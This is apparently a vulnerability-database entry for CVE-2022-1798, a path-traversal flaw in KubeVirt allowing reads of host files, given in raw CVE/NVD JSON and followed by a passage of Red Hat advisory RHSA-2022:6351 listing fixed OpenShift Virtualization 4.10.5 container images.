Action not permitted
Modal body text goes here.
Modal Title
Modal Body
cve-2022-1798
Vulnerability from cvelistv5
Published
2022-09-15 15:45
Modified
2025-04-21 13:49
Severity ?
EPSS score ?
Summary
A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve-coordination@google.com | https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364 | Exploit, Mitigation, Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364 | Exploit, Mitigation, Patch, Third Party Advisory |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Google LLC | Kubevirt |
Version: unspecified < 0.55.1 Version: unspecified < 0.56.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T00:17:00.704Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2022-1798", options: [ { Exploitation: "poc", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2025-04-21T13:39:15.451210Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2025-04-21T13:49:58.573Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { platforms: [ "all", ], product: "Kubevirt", vendor: "Google LLC", versions: [ { lessThan: "0.55.1", status: "affected", version: "unspecified", versionType: "custom", }, { lessThan: "0.56.0", status: "affected", version: "unspecified", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "Oliver Brooks and James Klopchic of NCC Group", }, { lang: "en", value: "Diane Dubois and Roman Mohr of Google", }, ], descriptions: [ { lang: "en", value: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 8.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-20", description: "CWE-20 Improper Input Validation", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-09-15T15:45:12.000Z", orgId: "14ed7db2-1595-443d-9d34-6215bf890778", shortName: "Google", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", }, ], source: { discovery: "EXTERNAL", }, title: "Path Traversal vulnerability in Kubevirt", x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@google.com", ID: "CVE-2022-1798", STATE: "PUBLIC", TITLE: "Path Traversal vulnerability in Kubevirt", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Kubevirt", version: { version_data: [ { platform: "all", version_affected: "<", version_value: "0.55.1", }, { platform: "all", version_affected: "<", version_value: "0.56.0", }, ], }, }, ], }, vendor_name: "Google LLC", }, ], }, }, credit: [ { lang: "eng", value: "Oliver Brooks and James Klopchic of NCC Group", }, { lang: "eng", value: "Diane Dubois and Roman Mohr of Google", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: { cvss: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 8.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H", version: "3.1", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-20 Improper Input Validation", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", refsource: "CONFIRM", url: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", }, ], }, source: { discovery: "EXTERNAL", }, }, }, }, cveMetadata: { assignerOrgId: "14ed7db2-1595-443d-9d34-6215bf890778", assignerShortName: "Google", cveId: "CVE-2022-1798", datePublished: "2022-09-15T15:45:12.000Z", dateReserved: "2022-05-19T00:00:00.000Z", dateUpdated: "2025-04-21T13:49:58.573Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", "vulnerability-lookup:meta": { nvd: "{\"cve\":{\"id\":\"CVE-2022-1798\",\"sourceIdentifier\":\"cve-coordination@google.com\",\"published\":\"2022-09-15T16:15:10.107\",\"lastModified\":\"2024-11-21T06:41:29.633\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de salto de ruta en KubeVirt versiones hasta 0.56 (y 0.55.1) en todas las plataformas permite a un usuario capaz de configurar el kubevirt para leer archivos arbitrarios en el sistema de archivos del host que son legibles públicamente o que son legibles para UID 107 o GID 107. /proc/self/() no es accesible\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.0,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.0,\"impactScore\":4.0}]},\"weaknesses\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionStartIncluding\":\"0.20.0\",\"versionEndExcluding\":\"0.55.1\",\"matchCriteriaId\":\"E3E349C1-0216-47B4-B160-13C5B99BC633\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mitigation\",\"Patch\",\"Third Party Advisory\"]}]}}", vulnrichment: { containers: "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-03T00:17:00.704Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2022-1798\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-04-21T13:39:15.451210Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-04-21T13:39:16.930Z\"}}], \"cna\": {\"title\": \"Path Traversal vulnerability in Kubevirt\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"value\": \"Oliver Brooks and James Klopchic of NCC Group\"}, {\"lang\": \"en\", \"value\": \"Diane Dubois and Roman Mohr of Google\"}], \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 8.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"Google LLC\", \"product\": \"Kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"unspecified\", \"lessThan\": \"0.55.1\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"unspecified\", \"lessThan\": \"0.56.0\", \"versionType\": \"custom\"}], \"platforms\": [\"all\"]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.0.9\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20 Improper Input Validation\"}]}], \"providerMetadata\": {\"orgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"shortName\": \"Google\", \"dateUpdated\": \"2022-09-15T15:45:12.000Z\"}, \"x_legacyV4Record\": {\"credit\": [{\"lang\": \"eng\", \"value\": \"Oliver Brooks and James Klopchic of NCC Group\"}, {\"lang\": \"eng\", \"value\": \"Diane Dubois and Roman Mohr of Google\"}], \"impact\": {\"cvss\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 8.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}, \"source\": {\"discovery\": \"EXTERNAL\"}, \"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"version\": {\"version_data\": [{\"platform\": \"all\", \"version_value\": \"0.55.1\", \"version_affected\": \"<\"}, {\"platform\": \"all\", \"version_value\": \"0.56.0\", \"version_affected\": \"<\"}]}, \"product_name\": \"Kubevirt\"}]}, \"vendor_name\": \"Google LLC\"}]}}, \"data_type\": \"CVE\", \"generator\": {\"engine\": \"Vulnogram 0.0.9\"}, \"references\": {\"reference_data\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\", \"refsource\": \"CONFIRM\"}]}, \"data_format\": \"MITRE\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.\"}]}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"CWE-20 Improper Input Validation\"}]}]}, \"data_version\": \"4.0\", \"CVE_data_meta\": {\"ID\": \"CVE-2022-1798\", \"STATE\": \"PUBLIC\", \"TITLE\": \"Path Traversal vulnerability in Kubevirt\", \"ASSIGNER\": \"security@google.com\"}}}}", cveMetadata: "{\"cveId\": \"CVE-2022-1798\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-04-21T13:49:58.573Z\", \"dateReserved\": \"2022-05-19T00:00:00.000Z\", \"assignerOrgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"datePublished\": \"2022-09-15T15:45:12.000Z\", \"assignerShortName\": \"Google\"}", dataType: "CVE_RECORD", dataVersion: "5.1", }, }, }
RHSA-2022:6351
Vulnerability from csaf_redhat
Published
2022-09-06 14:00
Modified
2024-11-25 08:02
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
This advisory contains the following OpenShift Virtualization 4.10.5 images:
RHEL-8-CNV-4.10
===============
cluster-network-addons-operator-container-v4.10.5-1
kubemacpool-container-v4.10.5-1
virt-cdi-importer-container-v4.10.5-1
hyperconverged-cluster-operator-container-v4.10.5-1
hostpath-provisioner-operator-container-v4.10.5-1
virtio-win-container-v4.10.5-1
virt-cdi-cloner-container-v4.10.5-1
kubevirt-ssp-operator-container-v4.10.5-1
cnv-containernetworking-plugins-container-v4.10.5-1
hyperconverged-cluster-webhook-container-v4.10.5-1
virt-cdi-apiserver-container-v4.10.5-1
ovs-cni-plugin-container-v4.10.5-1
virt-cdi-uploadserver-container-v4.10.5-1
virt-cdi-uploadproxy-container-v4.10.5-1
virt-cdi-controller-container-v4.10.5-1
kubevirt-template-validator-container-v4.10.5-1
virt-cdi-operator-container-v4.10.5-1
hostpath-provisioner-container-v4.10.5-1
hostpath-csi-driver-container-v4.10.5-1
kubernetes-nmstate-handler-container-v4.10.5-1
ovs-cni-marker-container-v4.10.5-1
bridge-marker-container-v4.10.5-1
node-maintenance-operator-container-v4.10.5-1
cnv-must-gather-container-v4.10.5-2
virt-controller-container-v4.10.5-3
virt-api-container-v4.10.5-3
virt-handler-container-v4.10.5-3
virt-operator-container-v4.10.5-3
virt-artifacts-server-container-v4.10.5-3
virt-launcher-container-v4.10.5-3
libguestfs-tools-container-v4.10.5-3
hco-bundle-registry-container-v4.10.5-6
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.10.5 images:\n\nRHEL-8-CNV-4.10\n===============\ncluster-network-addons-operator-container-v4.10.5-1\nkubemacpool-container-v4.10.5-1\nvirt-cdi-importer-container-v4.10.5-1\nhyperconverged-cluster-operator-container-v4.10.5-1\nhostpath-provisioner-operator-container-v4.10.5-1\nvirtio-win-container-v4.10.5-1\nvirt-cdi-cloner-container-v4.10.5-1\nkubevirt-ssp-operator-container-v4.10.5-1\ncnv-containernetworking-plugins-container-v4.10.5-1\nhyperconverged-cluster-webhook-container-v4.10.5-1\nvirt-cdi-apiserver-container-v4.10.5-1\novs-cni-plugin-container-v4.10.5-1\nvirt-cdi-uploadserver-container-v4.10.5-1\nvirt-cdi-uploadproxy-container-v4.10.5-1\nvirt-cdi-controller-container-v4.10.5-1\nkubevirt-template-validator-container-v4.10.5-1\nvirt-cdi-operator-container-v4.10.5-1\nhostpath-provisioner-container-v4.10.5-1\nhostpath-csi-driver-container-v4.10.5-1\nkubernetes-nmstate-handler-container-v4.10.5-1\novs-cni-marker-container-v4.10.5-1\nbridge-marker-container-v4.10.5-1\nnode-maintenance-operator-container-v4.10.5-1\ncnv-must-gather-container-v4.10.5-2\nvirt-controller-container-v4.10.5-3\nvirt-api-container-v4.10.5-3\nvirt-handler-container-v4.10.5-3\nvirt-operator-container-v4.10.5-3\nvirt-artifacts-server-container-v4.10.5-3\nvirt-launcher-container-v4.10.5-3\nlibguestfs-tools-container-v4.10.5-3\nhco-bundle-registry-container-v4.10.5-6\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6351", url: "https://access.redhat.com/errata/RHSA-2022:6351", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2094982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094982", }, { category: "external", summary: "2099324", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099324", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118367", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118367", }, { category: "external", summary: "2120061", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2120061", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6351.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update", tracking: { current_release_date: "2024-11-25T08:02:28+00:00", generator: { date: "2024-11-25T08:02:28+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2022:6351", initial_release_date: "2022-09-06T14:00:38+00:00", revision_history: [ { date: "2022-09-06T14:00:38+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-06T14:00:38+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-25T08:02:28+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.10 for RHEL 8", product: { name: "CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.10::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.10.5-2", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.10.5-6", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_id: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product_id: 